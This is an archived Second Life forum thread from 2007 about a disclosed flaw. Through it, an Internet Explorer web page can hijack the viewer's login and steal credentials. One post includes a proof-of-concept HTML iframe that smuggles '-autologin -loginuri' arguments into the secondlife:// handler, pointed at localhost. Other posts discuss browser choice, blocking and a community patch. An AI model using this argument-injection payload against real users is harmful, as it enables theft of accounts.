Second Life Forums Archive - IE (Internet Explorer) pwns SecondLife ?

Dytska Vieria

+/- .00004™

Join date: 13 Dec 2006

Posts: 768

09-17-2007 08:51

This was announced very recently:

http://www.securityfocus.com/archive/1/479698

"Attackers can steal the victim's login credentials, therefore hijacking their virtual persona, by simply tricking them into visiting a malicious Web page"

_____________________

+/- 0.00004

Kirah Hastings

Registered User

Join date: 8 Sep 2007

Posts: 5

09-17-2007 09:29

Ok so read this article... Now, how does one go about protecting oneself from this exploit, please? What all can be done to ward this off other than the obvious of not giving your password to anyone, changing it monthly, etc? Please be specific n Thanks

Asriazh Frye

Smart Cookie

Join date: 30 Sep 2006

Posts: 173

09-17-2007 10:15

So, the obvious would be to use Firefox or another mozilla based browser. I just tried the exploit and got:

Firefox doesn't know how to open this address, because the protocol (secondlife) isn't associated with any program.

Even if you use IE you should be fine if you also use Vista, since it should ask you if its ok to open the secondlife client.
I can't try out what happens on Win XP, since i don't have it installed. But if you want to try out what happens in a safe enviournment, open Notepad or whatever, paste in this

From: someone

<html>
<head>
<title>Example 1</title>
<body bgcolor="#FFFFFF" text="#000000">
<iframe src='secondlife://" -autologin -loginuri "http://localhost/login.php'></iframe>
</body>
</html>

and save it as "login-exploit.html" for example.
when you try to open this newly created page with IE, it will try to open the SL client and connect to your non existant PHP server.. or maybe not. You'll have to try this out yourself. But again, its a totally safe way to try out what actually would happen.

What might try to stop this exploit is (If you decide to stick with IE):
-Adding "secondlife://" to the list of blocked sites on IE
-Not using the auto save password feature of the SL client

-Asriazh

edit:
Grrr, the vbcode is messing with the html code i posted here, adding it stuff to it, even if i switch"automatically parse links in text" off

Ah, fixed ^^

Jotheph Nemeth

Registered User

Join date: 9 Aug 2007

Posts: 142

09-17-2007 15:41

How do you add secondlife:// as a blocked site to IE?

As far as I know, all you can do is add sites to block cookies.

Element Smirnov

Registered User

Join date: 13 Oct 2006

Posts: 108

09-17-2007 21:41

you can use maxthon (runs the IE core) or opera to block adds and url's. i use opera as my primary browser and maxthon when i need IE compatability. maxthon is what Internet explorer should be, like IE on steroids. Opera is what they all should be.
http://www.maxthon.com/
http://www.opera.com/
dont start with the firefox fanboy stuff

i never really liked firefox, but i think its good.

Jonash Vanalten

Registered User

Join date: 26 Nov 2006

Posts: 2

Patch for windows viewer 1.18.2.0

09-18-2007 12:23

I didn't want to wait for an updated viewer from Linden so I produced a binary patch for the windows viewer.

I've attached it to the JIRA entry. http://jira.secondlife.com/browse/VWR-2508

This should prevent the exploit working as it disables the -loginuri feature.

IE (Internet Explorer) pwns SecondLife ?
Dytska Vieria +/- .00004™ Join date: 13 Dec 2006 Posts: 768	09-17-2007 08:51 This was announced very recently: http://www.securityfocus.com/archive/1/479698 "Attackers can steal the victim's login credentials, therefore hijacking their virtual persona, by simply tricking them into visiting a malicious Web page" _____________________ +/- 0.00004
Kirah Hastings Registered User Join date: 8 Sep 2007 Posts: 5	09-17-2007 09:29 Ok so read this article... Now, how does one go about protecting oneself from this exploit, please? What all can be done to ward this off other than the obvious of not giving your password to anyone, changing it monthly, etc? Please be specific n Thanks
Asriazh Frye Smart Cookie Join date: 30 Sep 2006 Posts: 173	09-17-2007 10:15 So, the obvious would be to use Firefox or another mozilla based browser. I just tried the exploit and got: Firefox doesn't know how to open this address, because the protocol (secondlife) isn't associated with any program. Even if you use IE you should be fine if you also use Vista, since it should ask you if its ok to open the secondlife client. I can't try out what happens on Win XP, since i don't have it installed. But if you want to try out what happens in a safe enviournment, open Notepad or whatever, paste in this From: someone <html> <head> <title>Example 1</title> <body bgcolor="#FFFFFF" text="#000000"> <iframe src='secondlife://" -autologin -loginuri "http://localhost/login.php'></iframe> </body> </html> and save it as "login-exploit.html" for example. when you try to open this newly created page with IE, it will try to open the SL client and connect to your non existant PHP server.. or maybe not. You'll have to try this out yourself. But again, its a totally safe way to try out what actually would happen. What might try to stop this exploit is (If you decide to stick with IE): -Adding "secondlife://" to the list of blocked sites on IE -Not using the auto save password feature of the SL client -Asriazh edit: Grrr, the vbcode is messing with the html code i posted here, adding it stuff to it, even if i switch"automatically parse links in text" off Ah, fixed ^^
Jotheph Nemeth Registered User Join date: 9 Aug 2007 Posts: 142	09-17-2007 15:41 How do you add secondlife:// as a blocked site to IE? As far as I know, all you can do is add sites to block cookies.
Element Smirnov Registered User Join date: 13 Oct 2006 Posts: 108	09-17-2007 21:41 you can use maxthon (runs the IE core) or opera to block adds and url's. i use opera as my primary browser and maxthon when i need IE compatability. maxthon is what Internet explorer should be, like IE on steroids. Opera is what they all should be. http://www.maxthon.com/ http://www.opera.com/ dont start with the firefox fanboy stuff i never really liked firefox, but i think its good.
Jonash Vanalten Registered User Join date: 26 Nov 2006 Posts: 2	Patch for windows viewer 1.18.2.0 09-18-2007 12:23 I didn't want to wait for an updated viewer from Linden so I produced a binary patch for the windows viewer. I've attached it to the JIRA entry. http://jira.secondlife.com/browse/VWR-2508 This should prevent the exploit working as it disables the -loginuri feature.

Welcome to the Second Life Forums Archive

IE (Internet Explorer) pwns SecondLife ?